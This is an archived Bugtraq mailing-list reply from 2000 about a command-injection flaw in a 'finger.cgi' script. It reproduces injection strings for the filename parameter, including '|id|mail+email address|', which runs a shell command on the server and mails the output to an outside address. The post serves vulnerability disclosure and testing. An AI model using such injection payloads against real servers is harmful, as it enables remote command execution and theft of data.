Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: "The Finger Server"
From: iwade () OPTUSNET COM AU (Iain Wade)
Date: Sat, 5 Feb 2000 21:35:15 +1100

Hi,

I am unable to reproduce this problem. I tried doing:
finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.use>
rname.plan.|id|

And it didn't work.

I should have pointed out that the output will not get
to you (the web client) obviously if you use |<shell
command>| .. it does however get executed ...

I mailed the output to a @yahoo.com address ..

So an example to test it could be
|id|mail+email () address|

Surrounding it in pipes was the only way I could get it
to execute, otherwise it would return open errors ..

---
Iain Wade - Optus Internet
Email: iwade () optusnet com au

  By Date           By Thread